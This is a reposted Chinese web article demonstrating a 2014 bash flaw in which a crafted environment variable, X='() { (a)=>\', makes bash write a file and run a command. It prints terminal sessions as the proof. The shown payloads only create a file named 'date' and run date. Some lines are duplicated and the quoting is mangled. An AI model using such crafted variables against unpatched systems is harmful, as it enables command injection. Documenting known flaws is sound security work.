您的位置 首页 开关

一个linux下的bash安全漏洞

1. 通过设置一个特殊的环境变量的env,能间接地查到到linux命令的属性,如下:[2014-09-27 13:00:54 david@davidcchen ~]$ ls -l date

  1. 经过设置一个特别的环境变量的env,能间接地查到到linux指令的特点,如下:

  [2014-09-27 13:00:54 david@davidcchen ~]$ ls -l date

  ls: cannot access date: No such file or directory

  [2014-09-27 13:01:13 david@davidcchen ~]$ env -i X='() { (a)=>\’ bash -c ‘date’

  bash: X: line 1: syntax error near unexpected token `=’

  bash: X: line 1: `’

  bash: error importing function definition for `X’

  [2014-09-27 13:01:21 david@davidcchen ~]$ ls -l date

  -rw-rw-r–. 1 david david 0 Sep 27 13:01 date

  [2014-09-27 13:01:27 david@davidcchen ~]$

  2. 一次运转环境变量。

  [2014-09-27 13:01:27 david@davidcchen ~]$ zsh –version

  zsh 4.3.10 (x86_64-redhat-linux-gnu)

  [2014-09-27 13:03:24 david@davidcchen ~]$ bash –version

  GNU bash, version 4.1.2(1)-release (x86_64-redhat-linux-gnu)

  Copyright (C) 2009 Free Software Foundation, Inc.

  License GPLv3+: GNU GPL version 3 or later

  This is free software; you are free to change and redistribute it.

  There is NO WARRANTY, to the extent permitted by law.

  [2014-09-27 13:03:31 david@davidcchen ~]$ env X='() { (a)=>\’ bash -c echo date; cat echo; rm echo

  bash: X: line 1: syntax error near unexpected token `=’

  bash: X: line 1: `’

  bash: error importing function definition for `X’

  Sat Sep 27 13:03:52 CST 2014

  ———->成功运转date指令

  [2014-09-27 13:03:52 david@davidcchen ~]$

声明:本文内容来自网络转载或用户投稿,文章版权归原作者和原出处所有。文中观点,不代表本站立场。若有侵权请联系本站删除(kf@86ic.com)https://www.86ic.net/dianyuan/kaiguan/300152.html

为您推荐

联系我们

联系我们

在线咨询: QQ交谈

邮箱: kf@86ic.com

关注微信
微信扫一扫关注我们

微信扫一扫关注我们

返回顶部